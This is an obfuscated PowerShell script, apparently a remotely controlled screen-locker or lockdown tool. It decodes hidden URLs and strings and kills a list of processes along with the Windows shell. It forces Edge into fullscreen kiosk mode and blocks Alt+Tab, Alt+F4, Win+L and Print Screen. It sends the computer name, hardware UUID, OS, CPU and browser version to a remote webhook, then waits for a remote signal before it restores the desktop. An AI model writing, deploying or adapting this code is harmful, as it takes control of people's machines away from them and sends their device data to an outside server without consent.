$ErrorActionPreference = "Stop"

Add-Type -AssemblyName System.Windows.Forms

function ZroPvlNiogxD($title, $text, $duration) {
    $balloon = New-Object System.Windows.Forms.NotifyIcon
    $balloon.Icon = [System.Drawing.SystemIcons]::Warning
    $balloon.BalloonTipTitle = $title
    $balloon.BalloonTipText = $text
    $balloon.Visible = $true
    $balloon.ShowBalloonTip($duration * 1000)
    Start-Sleep -Seconds $duration
    $balloon.Dispose()
}

function biyxvWqtVtoO($link, $title, $color, $fields) {
    $embedBody = @{
        embeds = @(
            @{
                title = $title
                color = $color
                fields = $fields
            }
        )
    } | ConvertTo-Json -Depth 10

    try {
        Invoke-RestMethod -Uri $link -Method Post -ContentType "application/json" -Body $embedBody -ErrorAction Stop | Out-Null
    } catch {}
}

function OAVoILNHFNmq($reversed, $key) {
    $unreversed = -join ($reversed.ToCharArray() | Sort-Object { [array]::IndexOf($reversed.ToCharArray(), $_) } -Descending)
    $charArr = $reversed.ToCharArray()
    [array]::Reverse($charArr)
    $unreversed = -join $charArr
    $decoded = [System.Convert]::FromBase64String($unreversed)
    $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
    $result = New-Object byte[] $decoded.Length
    for ($i = 0; $i -lt $decoded.Length; $i++) {
        $result[$i] = $decoded[$i] -bxor $keyBytes[$i % $keyBytes.Length]
    }
    return [System.Text.Encoding]::UTF8.GetString($result)
}

$GhsyHlKfrSNj = @("93cfad2b", "7b80b2d8", "8a937caf", "22afa0a9", "58c7ef92", "6a708895", "63c8abdb", "b06ede75", "53e2d902", "e59b3549", "3da082c1", "a897cda0", "14a80f8a", "26f153a6", "8628ca17", "cee23efe", "42a1a951", "d56e1b9d", "916275f1", "dd189386", "4be7ca32", "73d72663", "59aa5f6d", "8f544637", "7a5a90c3", "33d2bc80", "5306b73e", "ab50baa0", "5c9300e6", "8f11b16b", "e78c4934", "52e415fe", "cde318cb", "c4e5c2f2", "d7224ce4", "d293261c", "25fc707a", "d9adc2a6", "13499779", "23522bcf", "e86528a2", "6d8fbe76", "e6c62413", "84c29ad8", "9d58ee87", "30406ee3", "6086255e", "ab2e0a9e", "8186c7b9", "b1ca6021", "e66e1981", "44fed0c3", "3fd5fe6e", "b196a599", "32f10ede", "c565aef8", "5284e9ca", "d0fd40c1", "89c4ac9f", "0ec35d5e", "d8c9e00e", "b3869a7d", "38bf8b72", "dd70c572", "0150a32d", "25e36dc4", "e57f9887", "bd811758", "9a4e64b2", "5c32b537", "bc273474", "98ca827e", "616d3894", "f22b8080", "2327922b", "2a2980f9", "b1334d88", "ee0e009d", "9d45524d", "58ed2420", "6e0f5605", "69e98e69", "4b810fe6", "9a639017", "e8a215c1", "6b623b3f", "7d0a4e6d", "ea70c081", "de9875a5", "a3e1c0d6", "5fbe0247", "d3184d03")
    $FOeJVmLyQojz = -join @($GhsyHlKfrSNj[64], $GhsyHlKfrSNj[88], $GhsyHlKfrSNj[21], $GhsyHlKfrSNj[54])
    $pBXZqvyMbkCj = -join @($GhsyHlKfrSNj[85], $GhsyHlKfrSNj[78], $GhsyHlKfrSNj[84], $GhsyHlKfrSNj[39])
    $qidJhZMyWFIR = -join @($GhsyHlKfrSNj[13], $GhsyHlKfrSNj[67], $GhsyHlKfrSNj[1], $GhsyHlKfrSNj[87])
    $ltrJRDEudQtI = -join @($GhsyHlKfrSNj[82], $GhsyHlKfrSNj[17], $GhsyHlKfrSNj[25], $GhsyHlKfrSNj[56])
    $kyfRVwzLTnaI = -join @($GhsyHlKfrSNj[5], $GhsyHlKfrSNj[68], $GhsyHlKfrSNj[36], $GhsyHlKfrSNj[9])
    $PIzALMduWpmQ = -join @($GhsyHlKfrSNj[48], $GhsyHlKfrSNj[33], $GhsyHlKfrSNj[49], $GhsyHlKfrSNj[20])
    $WIaqdNbFLVNY = -join @($GhsyHlKfrSNj[50], $GhsyHlKfrSNj[73], $GhsyHlKfrSNj[15], $GhsyHlKfrSNj[72])
    $lbuQQEYZKevX = -join @($GhsyHlKfrSNj[83], $GhsyHlKfrSNj[77], $GhsyHlKfrSNj[81], $GhsyHlKfrSNj[24])
    $GUdzFNrYkgiS = -join @($GhsyHlKfrSNj[2], $GhsyHlKfrSNj[10], $GhsyHlKfrSNj[40], $GhsyHlKfrSNj[70])
    $KLpmwUtAAQcn = -join @($GhsyHlKfrSNj[90], $GhsyHlKfrSNj[62], $GhsyHlKfrSNj[55], $GhsyHlKfrSNj[57])
    $pCQVxaIsZEWB = -join @($GhsyHlKfrSNj[11], $GhsyHlKfrSNj[32], $GhsyHlKfrSNj[89], $GhsyHlKfrSNj[44])
    $FpRvosYjSSZI = -join @($GhsyHlKfrSNj[7], $GhsyHlKfrSNj[60], $GhsyHlKfrSNj[23], $GhsyHlKfrSNj[71])
    $VfefGUeYVmnF = -join @($GhsyHlKfrSNj[75], $GhsyHlKfrSNj[46], $GhsyHlKfrSNj[59], $GhsyHlKfrSNj[76])
    $mQjAhXNRjqva = -join @($GhsyHlKfrSNj[28], $GhsyHlKfrSNj[16], $GhsyHlKfrSNj[91], $GhsyHlKfrSNj[37])
    $YovRfYvPRsph = -join @($GhsyHlKfrSNj[18], $GhsyHlKfrSNj[12], $GhsyHlKfrSNj[0], $GhsyHlKfrSNj[6])
    $JxltcngCrDuR = -join @($GhsyHlKfrSNj[45], $GhsyHlKfrSNj[14], $GhsyHlKfrSNj[30], $GhsyHlKfrSNj[19])
    $yCHMmDqzEhzW = -join @($GhsyHlKfrSNj[86], $GhsyHlKfrSNj[29], $GhsyHlKfrSNj[3], $GhsyHlKfrSNj[51])
    $UAWuGUqxUJBt = -join @($GhsyHlKfrSNj[42], $GhsyHlKfrSNj[74], $GhsyHlKfrSNj[65], $GhsyHlKfrSNj[35])
    $KuElbDsuwdgu = -join @($GhsyHlKfrSNj[66], $GhsyHlKfrSNj[22], $GhsyHlKfrSNj[27], $GhsyHlKfrSNj[38])
    $zXfKTdrOswJG = -join @($GhsyHlKfrSNj[41], $GhsyHlKfrSNj[80], $GhsyHlKfrSNj[61], $GhsyHlKfrSNj[26])
    $YbyVlWWdEPzu = -join @($GhsyHlKfrSNj[4], $GhsyHlKfrSNj[43], $GhsyHlKfrSNj[63], $GhsyHlKfrSNj[34])
    $cgKbLLTovQMm = -join @($GhsyHlKfrSNj[69], $GhsyHlKfrSNj[52], $GhsyHlKfrSNj[47], $GhsyHlKfrSNj[31])
    $fZJFfcVsmTVu = -join @($GhsyHlKfrSNj[79], $GhsyHlKfrSNj[58], $GhsyHlKfrSNj[8], $GhsyHlKfrSNj[53])

$rjWzWPizERoO = "BEQCE01VYNlVZxlWcxVGfh1BdM1WUoVRfBEBTsUHJIBQBVEW"
$YOjjEsZmieDV = "==gZ1lSDjRUJBBxUbpnZGBWSTdlXBIVdspyBXwjWUFgAx9FWpYFV5ZRfGUFRDYkXjVRa8sAUcJEYzMlKWByZLJEWYxlDR5BBVpAUWZwBBYgBVlgXAAVBFIwUZUBCN0lWXZVReoQRQ1BDXZgSQBkWWdUDdlEHYBkQCZhX"
$OhddOJLQqCyT = "==wFD5VDOsVBeByHWtgVVphVeMUXU8wV1oVQfdSGf51WechXSVxCXdAQHMUTAIEUB5lVf8UBQkhTJYUQSIkW"
$itGQbYIffsCi = "==QQARUWXETHKolUJYxAecxUFlwVx8ARflXTZ5AAXEhWdZ0WftVEHEUERZEDNtgVLFEVWkhScNUQMZBX"
$XXkwAVBqlmyT = "=gWEQw1RK0wRIJVQGlBEWBxWVZRXlsRFVoRXGZ1EUtBFZExALBVFOUBEbE0AY1FQKcFFFhxQBp1XdpUWRNUb"
$jcyCYMcYsTkc = "==gEPwgXWERUCJhSMhgFAJkVDYUEUFxRDp0AfNERdJUb"
$qdoSTmucPVku = "XdVEEYAWbBRQOA1WVI0VJFxFTVEM"
$ChiIVhqOkEMW = "A0FBrcRQf1EWFRQf"
$mCIEYumYklTs = "==wdwZDc"
$WAWDcFpfQfWC = "Z1QUVARXldxRF9VAM8gY"
$yfEuKGvbeyjH = "shmI"
$ONcFoweLQJTV = "XxQUXckUzQEARR1J"
$akLVPTkPolqV = "==gRElFRllBCfFlSBRQY"
$YSRJGYISUHaO = "=kUEwFkVaNkCCdlVLxwc"
$prcwDSsrbIBQ = "==wVbhVb"
$FTSuKYRjDOgz = "==QAA01UbxVc"
$LPXqGBVZsRgk = "==QRNplFBREAOAEFU5gQHYUBXZUEf1VCSBlCaR0UXUVQFtgb"
$GYkcgSSDAASA = "RdlFTxFUaBkVmNxXbtVRQMlN"
$cypJfoEYlRaS = "==QGWdFUVQEUWkhWWFEXUQ1XZVwDnAxGGQAEVNQQEUQGbhVUMhlCYx1M"
$MIhChwyBkoUC = "=kRBcJUXfJBWfVVFfQFBTR0WEI0CZxxc"
$vQFIDVUboMwq = "DIwUGsEW"
$owthOntRSEmK = "==wALJVHQVgVWBBW"
$dEsnkfhpNPvt = "RtBXWI0VG1FCVAEU"

try {
    $AzpyOdCisGiD = OAVoILNHFNmq $rjWzWPizERoO $FOeJVmLyQojz
    $CKarEVYHkQpM = OAVoILNHFNmq $YOjjEsZmieDV $pBXZqvyMbkCj
    $WJjApzsUgbuz = OAVoILNHFNmq $OhddOJLQqCyT $qidJhZMyWFIR
    $iVAShskGAyRL = OAVoILNHFNmq $itGQbYIffsCi $ltrJRDEudQtI
    $iCmNauZihpfi = OAVoILNHFNmq $XXkwAVBqlmyT $kyfRVwzLTnaI
    $EmBDrFrQYfiE = OAVoILNHFNmq $jcyCYMcYsTkc $PIzALMduWpmQ
    $tqBcUibWVYVD = OAVoILNHFNmq $qdoSTmucPVku $WIaqdNbFLVNY
    $gttXndOSRiqJ = OAVoILNHFNmq $ChiIVhqOkEMW $lbuQQEYZKevX
    $BLZSEHsQxDLA = OAVoILNHFNmq $mCIEYumYklTs $GUdzFNrYkgiS
    $bTXTZIShjALP = OAVoILNHFNmq $WAWDcFpfQfWC $KLpmwUtAAQcn
    $dZcdveAQLbhX = OAVoILNHFNmq $yfEuKGvbeyjH $pCQVxaIsZEWB
    $VoXXrmlduFQp = OAVoILNHFNmq $ONcFoweLQJTV $FpRvosYjSSZI
    $AFvqsOTTwwuP = OAVoILNHFNmq $akLVPTkPolqV $VfefGUeYVmnF
    $LXyjidnPWgDn = OAVoILNHFNmq $YSRJGYISUHaO $mQjAhXNRjqva
    $gXNiaSFPLaUm = OAVoILNHFNmq $prcwDSsrbIBQ $YovRfYvPRsph
    $DRqxjzfmGldQ = OAVoILNHFNmq $FTSuKYRjDOgz $JxltcngCrDuR
    $fQIKlchWOqxD = OAVoILNHFNmq $LPXqGBVZsRgk $yCHMmDqzEhzW
    $HbxpDdxfWHOG = OAVoILNHFNmq $GYkcgSSDAASA $UAWuGUqxUJBt
    $MFGLNOXoheGX = OAVoILNHFNmq $cypJfoEYlRaS $KuElbDsuwdgu
    $nhNePBnJUFzY = OAVoILNHFNmq $MIhChwyBkoUC $zXfKTdrOswJG
    $dIXfWxHHZNFO = OAVoILNHFNmq $vQFIDVUboMwq $YbyVlWWdEPzu
    $igNjnKUgrLae = OAVoILNHFNmq $owthOntRSEmK $cgKbLLTovQMm
    $bMZoAxaoOZjA = OAVoILNHFNmq $dEsnkfhpNPvt $fZJFfcVsmTVu
    $iCmNauZihpfi = $iCmNauZihpfi | ConvertFrom-Json
} catch { exit 1 }


$zfiYqKTaEXAi = (Get-CimInstance -Class Win32_ComputerSystemProduct).UUID
try {
    $uvGXyTisOmyB = (Invoke-WebRequest -Uri $WJjApzsUgbuz -UseBasicParsing -ErrorAction Stop).Content
} catch { exit 1 }

if ($uvGXyTisOmyB -match $zfiYqKTaEXAi) {
    ZroPvlNiogxD $DRqxjzfmGldQ $fQIKlchWOqxD 10
    exit 0
}

try {
    $DDkFcAPBNBwH = (Invoke-WebRequest -Uri $iVAShskGAyRL -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
} catch { exit 1 }

if ($DDkFcAPBNBwH -eq "true") {
    Write-Host $nhNePBnJUFzY
    exit 0
}

foreach ($bnOVizJrZzmt in $iCmNauZihpfi) {
    $JGQKpEmyBsHS = $bnOVizJrZzmt -replace "\.exe`$",""
    if (Get-Process -Name $JGQKpEmyBsHS -ErrorAction SilentlyContinue) {
        if ($bnOVizJrZzmt -notmatch "\.exe`$") {
            $bnOVizJrZzmt = "$bnOVizJrZzmt.exe"
        }
        try {
            taskkill /F /IM $bnOVizJrZzmt /T 2>&1 | Out-Null
        } catch {}
    }
}

if (Get-Process -Name "explorer" -ErrorAction SilentlyContinue) {
    try {
        taskkill /F /IM $bMZoAxaoOZjA /T 2>&1 | Out-Null
    } catch {}
}

Start-Process $igNjnKUgrLae "--kiosk `"$AzpyOdCisGiD`" --edge-kiosk-type=fullscreen --no-first-run"

Start-Sleep -Seconds 3

$bBLBTbgvYaAy = @"
using System;
using System.Runtime.InteropServices;
public class KeyBlock {
    [DllImport("user32.dll")]
    public static extern bool RegisterHotKey(IntPtr hWnd, int id, uint fsModifiers, uint vk);
    [DllImport("user32.dll")]
    public static extern bool UnregisterHotKey(IntPtr hWnd, int id);
    [DllImport("user32.dll")]
    public static extern IntPtr GetForegroundWindow();
    [DllImport("user32.dll", SetLastError=true)]
    public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint processId);
    [DllImport("user32.dll")]
    public static extern bool SetForegroundWindow(IntPtr hWnd);

    private const uint MOD_ALT = 0x0001;
    private const uint MOD_CONTROL = 0x0002;
    private const uint MOD_WIN = 0x0008;

    public static void BlockKeys() {
        RegisterHotKey(IntPtr.Zero, 1, MOD_ALT, 0x09);
        RegisterHotKey(IntPtr.Zero, 2, MOD_ALT | MOD_CONTROL, 0x09);
        RegisterHotKey(IntPtr.Zero, 3, MOD_WIN, 0x44);
        RegisterHotKey(IntPtr.Zero, 4, MOD_WIN, 0x09);
        RegisterHotKey(IntPtr.Zero, 5, MOD_ALT, 0x73);
        RegisterHotKey(IntPtr.Zero, 6, MOD_CONTROL, 0x1B);
        RegisterHotKey(IntPtr.Zero, 7, MOD_WIN, 0x45);
        RegisterHotKey(IntPtr.Zero, 8, MOD_WIN, 0x52);
        RegisterHotKey(IntPtr.Zero, 9, MOD_ALT, 0x1B);
        RegisterHotKey(IntPtr.Zero, 10, MOD_WIN, 0x4C);
        RegisterHotKey(IntPtr.Zero, 11, 0, 0x2C);
        RegisterHotKey(IntPtr.Zero, 12, MOD_WIN, 0x2C);
        RegisterHotKey(IntPtr.Zero, 13, MOD_ALT, 0x2C);
    }

    public static void UnblockKeys() {
        for (int i = 1; i <= 13; i++) {
            UnregisterHotKey(IntPtr.Zero, i);
        }
    }
}
"@

try {
    Add-Type -TypeDefinition $bBLBTbgvYaAy -ErrorAction Stop
} catch { }

[KeyBlock]::BlockKeys()

$puDGuXAteEWI = $env:COMPUTERNAME
$aBAEFecBRMXo = (Get-CimInstance -Class Win32_OperatingSystem).Caption
$czqPNhWBpOcq = (Get-CimInstance -Class Win32_Processor).Name
$wMtlplOHFWWm = (Get-Item "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
if (-not $wMtlplOHFWWm) {
    $wMtlplOHFWWm = (Get-Item "C:\Program Files\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
}
if (-not $wMtlplOHFWWm) { $wMtlplOHFWWm = "Unknown" }
$STxqUCAQAktD = Get-Date -Format "HH:mm:ss | dd/MM/yyyy"

$bDQfePCJTasT = @(
    @{ name = $gttXndOSRiqJ; value = $puDGuXAteEWI; inline = $true }
    @{ name = $BLZSEHsQxDLA; value = $zfiYqKTaEXAi; inline = $true }
    @{ name = $bTXTZIShjALP; value = $aBAEFecBRMXo; inline = $false }
    @{ name = $dZcdveAQLbhX; value = $czqPNhWBpOcq; inline = $false }
    @{ name = $VoXXrmlduFQp; value = $wMtlplOHFWWm; inline = $true }
    @{ name = $AFvqsOTTwwuP; value = $STxqUCAQAktD; inline = $true }
)
biyxvWqtVtoO $CKarEVYHkQpM $EmBDrFrQYfiE 3066993 $bDQfePCJTasT

$global:dLlVGlbTwybM = $true

$jeJCpwyOVcHI = Start-Job -ScriptBlock {
    param($url)
    while ($true) {
        try {
            $UunmKxMLYgSH = (Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
            if ($UunmKxMLYgSH -eq "true") {
                return "completed"
            }
        } catch {}
        Start-Sleep -Seconds 20
    }
} -ArgumentList $iVAShskGAyRL

while ($global:dLlVGlbTwybM) {
    if ($jeJCpwyOVcHI.State -eq "Completed") {
        $condition = Receive-Job -Job $jeJCpwyOVcHI
        if ($condition -eq "completed") {
            [KeyBlock]::UnblockKeys()
            taskkill /F /IM $igNjnKUgrLae /T 2>&1 | Out-Null
            Start-Process $bMZoAxaoOZjA
            $global:dLlVGlbTwybM = $false
            break
        }
    }

    $GpBlAcjOIsgi = [KeyBlock]::GetForegroundWindow()
    $pDGzXlEsQPsM = 0
    [KeyBlock]::GetWindowThreadProcessId($GpBlAcjOIsgi, [ref]$pDGzXlEsQPsM) | Out-Null
    $TSDbgFshWyZl = $null
    try { $TSDbgFshWyZl = Get-Process -Id $pDGzXlEsQPsM -ErrorAction Stop } catch {}

    if ($TSDbgFshWyZl -and $TSDbgFshWyZl.ProcessName -ne $dIXfWxHHZNFO) {
        $EBzCoTBWlsfA = @(
            @{ name = $gttXndOSRiqJ; value = $puDGuXAteEWI; inline = $true }
            @{ name = $BLZSEHsQxDLA; value = $zfiYqKTaEXAi; inline = $true }
            @{ name = $LXyjidnPWgDn; value = $TSDbgFshWyZl.ProcessName; inline = $false }
            @{ name = $gXNiaSFPLaUm; value = (Get-Date -Format "HH:mm:ss | dd/MM/yyyy"); inline = $false }
        )
        biyxvWqtVtoO $CKarEVYHkQpM $tqBcUibWVYVD 15158332 $EBzCoTBWlsfA

        ZroPvlNiogxD $HbxpDdxfWHOG $MFGLNOXoheGX 5

        [KeyBlock]::UnblockKeys()
        taskkill /F /IM $igNjnKUgrLae /T 2>&1 | Out-Null
        Start-Process $bMZoAxaoOZjA
        
        $global:dLlVGlbTwybM = $false
        break
    }

    Start-Sleep -Milliseconds 500
}

[KeyBlock]::UnblockKeys()
Stop-Job -Job $jeJCpwyOVcHI -ErrorAction SilentlyContinue
Remove-Job -Job $jeJCpwyOVcHI -Force -ErrorAction SilentlyContinue
Get-Job | Where-Object { $_.State -ne "Running" } | Remove-Job -Force -ErrorAction SilentlyContinue
